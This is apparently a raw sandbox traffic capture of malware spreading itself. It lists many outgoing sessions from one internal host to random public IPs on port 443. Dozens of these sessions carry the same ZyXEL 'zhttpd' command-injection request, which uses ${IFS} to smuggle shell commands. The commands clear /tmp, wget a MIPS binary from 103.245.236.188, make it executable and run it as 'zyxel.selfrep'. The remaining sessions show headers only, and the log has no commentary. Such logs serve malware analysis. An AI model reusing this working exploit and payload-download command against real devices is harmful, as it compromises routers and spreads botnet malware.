                                                Jan 12, 2024 18:16:43.936222076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9590192.168.2.2347140207.101.211.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936223030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9591192.168.2.234542617.110.37.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936264992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9592192.168.2.2334448164.135.193.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936291933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9593192.168.2.2350640136.220.25.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936350107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9594192.168.2.2359556132.40.184.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936417103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9595192.168.2.234665274.211.44.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936418056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9596192.168.2.235247893.194.22.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936435938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9597192.168.2.235054293.254.44.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936470032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9598192.168.2.235885423.68.67.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936542988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9599192.168.2.2356546145.56.234.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936635971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9600192.168.2.235552414.255.127.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936635971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9601192.168.2.2352266199.93.59.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936650038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9602192.168.2.2358128107.3.132.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936690092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9603192.168.2.2343918157.89.2.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936747074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9604192.168.2.2358596183.31.28.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936856031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9605192.168.2.2350970122.64.71.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936856031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9606192.168.2.234148832.182.199.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936880112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9607192.168.2.234599031.37.176.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936892033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9608192.168.2.2334560201.97.112.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936961889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9609192.168.2.2336992219.107.125.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937005997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9610192.168.2.235010867.201.147.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937063932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9611192.168.2.2335250171.194.60.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937092066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9612192.168.2.2346302176.157.23.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937114000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9613192.168.2.2334230213.145.253.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937144995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9614192.168.2.234644231.125.129.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937181950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9615192.168.2.2343526202.105.1.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937252045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9616192.168.2.233768251.120.195.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937308073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9617192.168.2.234232852.218.154.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937351942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9618192.168.2.235540857.230.0.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937372923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9619192.168.2.2338386178.216.148.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937388897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9620192.168.2.2338342152.231.195.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937462091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9621192.168.2.235070037.178.241.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937479973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9622192.168.2.233706642.241.74.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937482119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9623192.168.2.2332784217.159.45.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937491894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9624192.168.2.2347052120.36.234.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937520981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9625192.168.2.2340760102.33.179.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937531948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9626192.168.2.2354578155.23.151.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937536955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9627192.168.2.2345394186.46.9.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.937565088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9628192.168.2.2335102159.234.79.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9629192.168.2.2334872218.143.220.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9630192.168.2.2334284153.59.162.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9631192.168.2.2351490210.135.196.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9632192.168.2.233737690.234.97.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9633192.168.2.2355110117.177.27.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9634192.168.2.2360030136.13.66.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9635192.168.2.2349670143.219.149.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9636192.168.2.2353554121.104.140.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9637192.168.2.2356798149.71.123.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9638192.168.2.234576663.139.20.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9639192.168.2.2338712149.8.176.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9640192.168.2.2358678165.28.175.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9641192.168.2.23555682.113.210.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9642192.168.2.2344072173.141.104.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9643192.168.2.2353636185.33.65.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9644192.168.2.2348688183.191.5.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9645192.168.2.2342584153.113.5.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9646192.168.2.2348382173.240.243.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9647192.168.2.2338930207.239.165.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9648192.168.2.2345982131.223.94.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9649192.168.2.2335678212.6.122.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9650192.168.2.2335808202.65.119.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9651192.168.2.2346616134.185.19.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9652192.168.2.234220092.212.67.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9653192.168.2.234539227.35.39.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9654192.168.2.2344262187.249.211.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9655192.168.2.234570235.49.201.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9656192.168.2.235112827.47.73.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9657192.168.2.23446429.6.68.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9658192.168.2.2345898188.181.35.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9659192.168.2.2333108202.212.21.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9660192.168.2.2333766198.152.184.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9661192.168.2.2343882189.48.210.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9662192.168.2.235111082.219.75.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9663192.168.2.2359382209.106.8.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9664192.168.2.2348938161.78.105.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9665192.168.2.2344300147.230.59.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9666192.168.2.2343248201.116.141.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9667192.168.2.235628225.251.77.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9668192.168.2.2352134132.159.65.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9669192.168.2.235821027.19.197.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9670192.168.2.2336552153.100.101.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9671192.168.2.233719064.137.89.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9672192.168.2.2336534159.227.189.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9673192.168.2.2336592181.141.242.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9674192.168.2.233855414.4.116.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9675192.168.2.235791445.99.51.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9676192.168.2.2359208105.191.145.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9677192.168.2.233966076.89.252.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9678192.168.2.233342499.151.126.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9679192.168.2.2348046152.255.79.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9680192.168.2.2347000108.79.210.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9681192.168.2.2347990172.152.210.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9682192.168.2.2342846206.222.183.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9683192.168.2.2343432140.49.58.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9684192.168.2.233713075.42.196.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9685192.168.2.234344876.117.11.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9686192.168.2.235153245.15.254.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9687192.168.2.2337794205.191.106.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9688192.168.2.2335438112.207.164.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9689192.168.2.2333198156.102.188.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9690192.168.2.234186884.119.11.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9691192.168.2.2344250199.167.154.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9692192.168.2.235524239.51.38.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9693192.168.2.2339584112.160.220.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9694192.168.2.2355070164.57.0.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9695192.168.2.234624477.249.57.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9696192.168.2.235874050.174.79.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9697192.168.2.2342904209.236.220.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9698192.168.2.2341624107.59.58.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9699192.168.2.2355650199.170.221.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9700192.168.2.2333058178.228.39.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9701192.168.2.233574427.83.242.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9702192.168.2.2359826159.42.71.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9703192.168.2.23601629.116.202.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9704192.168.2.2354368128.225.167.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9705192.168.2.2354720158.59.232.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9706192.168.2.2354576201.222.32.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9707192.168.2.2354262150.10.10.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9708192.168.2.2346088175.22.30.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9709192.168.2.2336966194.118.81.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9710192.168.2.236061818.136.58.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9711192.168.2.2339734100.134.76.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9712192.168.2.233694058.217.155.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9713192.168.2.2343686134.87.233.64443
                                                TimestampBytes transferredDirectionData


